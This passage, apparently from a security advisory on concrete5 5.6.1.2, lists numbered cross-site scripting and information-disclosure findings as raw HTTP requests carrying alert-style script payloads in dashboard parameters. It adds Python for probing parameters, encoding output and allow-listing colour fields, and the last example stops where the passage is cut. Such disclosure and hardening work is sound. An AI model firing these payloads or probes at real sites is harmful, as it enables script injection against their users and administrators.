GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(1111)</script>&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
12. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir="><script>alert(123)</script>&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
13. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by="><script>alert(/1/)</script>XXX&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
14. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(2)</script>&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
15. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/save_mobile_theme/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 94
MOBILE_THEME_ID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&save_mobile_theme=Save
---< request >---
Note: no ccm_token is present in this body (Content-Length 94 matches exactly the two parameters shown; the bodies in 32 and 33 carry none either), so whether these handlers validate a token at all is a separate check worth making.
16. XSS via the SQL error message (the value is backslash-escaped for MySQL, so there is no SQL break-out, but the failed statement is echoed into the page without HTML encoding):
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/types/add/do_add/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 187
ccm_token=1376290923%3Acf6fd358ef1afdfbf6d0206725a108b4&task=add&ctName=asdasdasd&ctHandle=asdasdasdasd&ctIcon='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&ccm-submit-add_page_type=Add
---< request >---
resp:
<div class="alert alert-error"><button type="button" class="close" data-dismiss="alert">×</button>
mysql error: [1062: Duplicate entry 'asdasdasdasd' for key 'ctHandle'] in EXECUTE("insert into PageTypes (ctHandle, ctName, ctIcon, ctIsInternal, pkgID) values ('asdasdasdasd', 'asdasdasd', '\'>\"><body onload=alert(/4321/)>', 0, 0)")
<br/>
</div>
17. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/users/attributes/edit/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 314
akID=10&akHandle=profile_private_messages_enabled&akName=%2f#%3csvg%2fonload%3dalert(4321)%3e&asID=0&akIsSearchableIndexed=1&akIsSearchable=1&atID=3&akCategoryID=2&ccm_token=1376290584%3A871b3d29741d11ea375c5803f202ce16&uakProfileEdit=1&uakRegisterEdit=1&akCheckedByDefault=1&ccm-submit-ccm-attribute-key-form=Save
---< request >---
18. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 971
input_theme_style_body-background_1='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
resp:
<input type="hidden" name="input_theme_style_body-background_1" id="input_theme_style_body-background_1" value="'>"><img/src="x"/onerror="alert(4321)">" />
<div class="ccm-theme-style-color " id="theme_style_body-background_1"><div hex-color="'>"><img/src="x"/onerror="alert(4321)">" style="background-color: '>"><img/src="x"/onerror="alert(4321)">"></div></div>
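The reflections in 2, 4-7, 9, 11-14 and 18 differ only in where the value lands: item 2 inside a JavaScript string literal, the rest inside an HTML attribute or tag body. The script below is an added example, not code from this post or from concrete5. It rebuilds the two observed outputs (items 2 and 18) from the quoted responses, classifies a reflection as raw or encoded, shows the encoding each context needs (render_upload_callback and render_hidden_input are assumed fixes, not concrete5's code), and generates one probe URL per query parameter of the search_results request from item 4 so each parameter can be checked with a distinct canary. The canary prefix and the function names are this example's own choices.

```python
import html
from urllib.parse import parse_qsl, urlencode, urlparse, urlunparse

# Constructed from the responses quoted in this post: item 2 (the value lands
# inside a JavaScript string literal) and item 18 (the value lands inside an
# HTML attribute). Not fetched from a live server.
PAYLOAD_JS = "');</script><script>alert(2);</script>//"
PAYLOAD_ATTR = "'>\"><img/src=\"x\"/onerror=\"alert(4321)\">"
SAMPLE_JS_RESPONSE = "window.parent.ccm_filesUploadedDialog('" + PAYLOAD_JS + "');"
SAMPLE_ATTR_RESPONSE = (
    '<input type="hidden" name="input_theme_style_body-background_1" '
    'id="input_theme_style_body-background_1" value="' + PAYLOAD_ATTR + '" />'
)
# The GET request from item 4, query string in its original order.
SEARCH_RESULTS_URL = (
    "http://10.149.14.52/concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results"
    "?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by="
    "&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField="
    "&selectedSearchField%5B%5D="
)

_JS_STRING_ESCAPES = {
    "\\": "\\\\", "'": "\\'", '"': '\\"', "<": "\\u003c", ">": "\\u003e",
    "/": "\\/", "\n": "\\n", "\r": "\\r", "\u2028": "\\u2028", "\u2029": "\\u2029",
}


def encode_js_string(value):
    """Encode for a quoted JS string literal. '<' and '/' are escaped as well,
    so the HTML parser can never see '</script>' inside the string (item 2)."""
    return "".join(_JS_STRING_ESCAPES.get(ch, ch) for ch in value)


def encode_html_attr(value):
    """Encode for a double-quoted HTML attribute value (items 18-28)."""
    return html.escape(value, quote=True)


def reflection_state(body, value):
    """How did `value` come back: 'raw', 'html-encoded', 'js-encoded' or 'absent'?
    Use a value containing < > ' " so the encoded forms differ from the raw one."""
    if value in body:
        return "raw"
    if encode_html_attr(value) in body:
        return "html-encoded"
    if encode_js_string(value) in body:
        return "js-encoded"
    return "absent"


def render_upload_callback(search_instance):
    """Hardened form of the item-2 output (assumed fix, not concrete5's code)."""
    return "window.parent.ccm_filesUploadedDialog('" + encode_js_string(search_instance) + "');"


def render_hidden_input(name, value):
    """Hardened form of the item-18 output (assumed fix, not concrete5's code)."""
    safe_name = encode_html_attr(name)
    return '<input type="hidden" name="%s" id="%s" value="%s" />' % (
        safe_name, safe_name, encode_html_attr(value))


def build_probes(url, canary_prefix="xq<>'\""):
    """One probe URL per query parameter, each carrying a distinct canary that
    contains the characters the encoders must handle; every other parameter is
    left exactly as in the original request. Returns [(name, canary, url), ...]."""
    parts = urlparse(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    probes = []
    for i, (name, _) in enumerate(params):
        canary = "%s%d" % (canary_prefix, i)
        mutated = [(n, canary if j == i else v) for j, (n, v) in enumerate(params)]
        probes.append((name, canary, urlunparse(parts._replace(query=urlencode(mutated)))))
    return probes


if __name__ == "__main__":
    print("item 2 as observed :", reflection_state(SAMPLE_JS_RESPONSE, PAYLOAD_JS))
    print("item 2 hardened    :", reflection_state(render_upload_callback(PAYLOAD_JS), PAYLOAD_JS))
    print("item 18 as observed:", reflection_state(SAMPLE_ATTR_RESPONSE, PAYLOAD_ATTR))
    print("item 18 hardened   :", reflection_state(
        render_hidden_input("input_theme_style_body-background_1", PAYLOAD_ATTR), PAYLOAD_ATTR))
    for name, canary, probe in build_probes(SEARCH_RESULTS_URL):
        print(name, "->", probe)   # send each, then reflection_state(resp.text, canary)
```

Sending the probes needs the admin session cookie the requests above were made with; for each response, reflection_state(resp.text, canary) == "raw" reproduces the finding for that parameter, and "html-encoded" or "js-encoded" means the output was fixed for that context.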
19. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
20. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
21. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
22. information disclosure (an unchecked pkID reaches PermissionAccess::getByID() as null; the PHP error leaks file paths):
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
paID=60&blockTypesIncluded%5B1%5D=A
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:15:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 359
Connection: close
Content-Type: text/html
Catchable fatal error: Argument 2 passed to Concrete5_Model_PermissionAccess::getByID() must be an instance of PermissionKey, null given, called in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 23 and defined in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/access/model.php on line 206
23. information disclosure (an invalid paID yields a non-object; the PHP fatal error leaks file paths):
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID=16 HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
paID="%20body%20onload%3d"alert(4321)"%3e&blockTypesIncluded%5B1%5D=A
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:16:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 165
Connection: close
Content-Type: text/html
Fatal error: Call to a member function save() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 24
24. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1033
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
25. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
26. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
27. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 965
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
28. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 952
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1="%20body%20onload%3d"alert(4321)"%3e&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
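Items 18-21 and 24-28 are all the same defect: a field that can only ever legitimately hold a CSS colour is stored and echoed as free text, into value="...", hex-color="..." and style="background-color: ...". Attribute encoding alone is not the right fix for the style attribute (CSS has its own syntax to abuse), so the correct fix is an allow-list on input. The code below is an added example, not from this post or from concrete5; it decodes a cut-down copy of the item-24 body (whose nav-hover value is the item-18 payload with every byte percent-encoded, which makes no difference once decoded), validates the colour fields, and renders the swatch markup from item 18 only from validated values. The assumption that fields named input_theme_style_<name>_1 are the colour fields, the default colour and the short colour-name list are this example's own.

```python
import html
import re
from urllib.parse import parse_qsl

# Constructed from the item-24 request body, cut down to five fields. The
# nav-hover value is the item-18 payload with every byte percent-encoded.
SAMPLE_THEME_BODY = (
    "input_theme_style_body-background_1=%23dff5ff"
    "&input_theme_style_nav-hover_1=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22"
    "%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e"
    "&input_theme_style_tag-highlight_1=%22%20body%20onload%3d%22alert(4321)%22%3e"
    "&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B"
    "&themeID=4"
)

HEX_COLOR_RE = re.compile(r"\A#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})\Z")
NAMED_COLORS = frozenset({"black", "white", "red", "green", "blue", "transparent"})  # assumed list
DEFAULT_COLOR = "#ffffff"  # assumed fallback for a rejected value


def validate_css_color(value):
    """Return the value if it is a #rgb/#rrggbb literal or a known colour name,
    else None. Markup, url(...), expression(...) and extra declarations all fail."""
    v = value.strip()
    if HEX_COLOR_RE.match(v) or v.lower() in NAMED_COLORS:
        return v
    return None


def sanitize_theme_form(body):
    """Decode the form body the way PHP does and validate every colour field.
    Assumption for this example: fields named input_theme_style_<name>_1 are
    colours; other fields are ignored here. Returns {field: (value, accepted)}."""
    result = {}
    for name, raw in parse_qsl(body, keep_blank_values=True):
        if name.startswith("input_theme_style_") and name.endswith("_1"):
            color = validate_css_color(raw)
            result[name] = (color, True) if color else (DEFAULT_COLOR, False)
    return result


def render_swatch(style_name, color):
    """Same markup as the item-18 response, but only ever fed a validated
    colour, and attribute-encoded anyway (defence in depth)."""
    safe = html.escape(color, quote=True)
    return ('<div class="ccm-theme-style-color" id="theme_style_%s">'
            '<div hex-color="%s" style="background-color: %s"></div></div>'
            % (html.escape(style_name, quote=True), safe, safe))


if __name__ == "__main__":
    for field, (value, accepted) in sanitize_theme_form(SAMPLE_THEME_BODY).items():
        print("%-40s %-9s %s" % (field, "accepted" if accepted else "rejected", value))
    print(render_swatch("nav-hover_1", DEFAULT_COLOR))
```

The same allow-list approach applies to the other "settings" fields in this post that have a known shape (MOBILE_THEME_ID in 15 is an integer, miEmail in 33 is an e-mail address); the tracking-code field in 31 is the one that legitimately has to hold raw markup.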
29. information disclosure (an invalid pdID yields a non-object; the PHP fatal error leaks file paths)
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/access_entity HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
task=save_permissions&accessType=10&peID=6&pdID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&pdStartDate_activate=on&pdStartDate_dt=8%2F12%2F2013&pdStartDate_h=9&pdStartDate_m=16&pdStartDate_a=AM&pdEndDate_activate=on&pdEndDate_dt=8%2F12%2F2013&pdEndDate_h=9&pdEndDate_m=16&pdEndDate_a=AM&pdRepeatPeriod=&pdRepeatPeriodDaysEvery=1&pdRepeatPeriodMonthsRepeatBy=month&pdRepeatPeriodMonthsEvery=1&pdRepeatPeriodWeeksDays%5B%5D=1&pdRepeatPeriodWeeksEvery=1&pdEndRepeatDate=
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:19:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html
Fatal error: Call to a member function setStartDateAllDay() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/duration.php on line 205
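The error pages in 3 and 16 look alike but mean different things: in 3 the value sits bare in the LIMIT clause, in 16 it sits inside a string literal and was backslash-escaped, so only the HTML echo of the statement is the problem. The PHP errors in 8, 10, 22, 23 and 29 are a third kind, where the value is only worth the file paths it leaks. The code below is an added example, not from this post or from concrete5, that does this triage from the response text alone: it parses the "mysql error: [code: message] in EXECUTE(...)" block, walks the statement the way MySQL tokenises single-quoted literals to decide whether the marker landed quoted or unquoted, pulls the PHP error lines, and reports the common directory of the leaked paths. The sample responses are constructed from the ones quoted above (the item-3 statement is abridged to its first and last clauses); the function names and verdict strings are this example's own.

```python
import os
import re

# Constructed from the responses quoted in this post (items 3 and 16 for the
# MySQL errors, items 8 and 10 for the PHP errors); the item-3 statement is
# abridged to its first and last clauses.
SAMPLE_LIMIT_ERROR = (
    '<h1>An unexpected error occurred.</h1>\n'
    '<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an '
    'error in your SQL syntax; check the manual that corresponds to your MySQL server version '
    "for the right syntax to use near '11111111111111111111111' at line 1] in "
    'EXECUTE("select p1.cID, pt.ctHandle from Pages p1 where 1=1 and cvName like \'%asd%\' '
    'and p1.cIsActive = \'1\' limit 0,11111111111111111111111 ")\n</div>'
)
SAMPLE_DUP_ERROR = r"""<div class="alert alert-error"><button type="button" class="close" data-dismiss="alert">×</button>
mysql error: [1062: Duplicate entry 'asdasdasdasd' for key 'ctHandle'] in EXECUTE("insert into PageTypes (ctHandle, ctName, ctIcon, ctIsInternal, pkgID) values ('asdasdasdasd', 'asdasdasd', '\'>\"><body onload=alert(/4321/)>', 0, 0)")
<br/>
</div>"""
SAMPLE_PHP_ERRORS = (
    "Warning: Division by zero in /var/www/concrete5/concrete5.6.1.2/concrete/core/libraries/item_list.php on line 263\n"
    "Fatal error: Call to a member function getAttributeType() on a non-object in "
    "/var/www/concrete5/concrete5.6.1.2/concrete/core/controllers/single_pages/dashboard/files/search.php on line 134\n"
)

MYSQL_ERROR_RE = re.compile(
    r'mysql error: \[(?P<code>\d+): (?P<message>.*?)\] in EXECUTE\("(?P<statement>.*)"\)', re.S)
PHP_ERROR_RE = re.compile(
    r"(?P<level>Warning|Notice|Fatal error|Catchable fatal error): (?P<message>.*?) "
    r"in (?P<file>/\S+?\.php) on line (?P<line>\d+)")


def parse_mysql_error(body):
    """Code, message and the failed statement from a concrete5 error page, or None."""
    m = MYSQL_ERROR_RE.search(body)
    if not m:
        return None
    return {"code": int(m.group("code")), "message": m.group("message"),
            "statement": m.group("statement")}


def literal_context(statement, marker):
    """'quoted' if the first occurrence of `marker` sits inside a single-quoted
    SQL string literal, 'unquoted' if it sits in bare SQL, None if absent.
    Backslash escapes and doubled quotes are skipped the way MySQL tokenises them."""
    pos = statement.find(marker)
    if pos < 0:
        return None
    in_string = False
    i = 0
    while i < pos:
        ch = statement[i]
        if in_string and ch == "\\":
            i += 1                      # escaped character: skip it
        elif in_string and ch == "'":
            if statement[i + 1:i + 2] == "'":
                i += 1                  # doubled quote inside the literal
            else:
                in_string = False
        elif ch == "'":
            in_string = True
        i += 1
    return "quoted" if in_string else "unquoted"


def parse_php_errors(body):
    """Every PHP warning/fatal line with the file path and line number it leaks."""
    return [{"level": m.group("level"), "message": m.group("message"),
             "file": m.group("file"), "line": int(m.group("line"))}
            for m in PHP_ERROR_RE.finditer(body)]


def install_root(php_errors):
    """Longest common directory of the leaked paths: what a handful of these
    errors tells an attacker about the web root layout."""
    files = [e["file"] for e in php_errors]
    return os.path.commonpath(files) if files else None


def triage(body, marker):
    """Combine the checks into one verdict for a response to a request that
    carried `marker` in the parameter under test."""
    err = parse_mysql_error(body)
    if err is None:
        return {"sql_error": False, "php_errors": parse_php_errors(body)}
    ctx = literal_context(err["statement"], marker)
    echoed = marker in body
    if ctx == "unquoted":
        verdict = "input concatenated into SQL unquoted: injection candidate"
    elif ctx == "quoted" and echoed:
        verdict = ("input escaped inside a SQL literal, but the failed statement is "
                   "echoed into HTML unencoded: XSS in the error page")
    elif ctx == "quoted":
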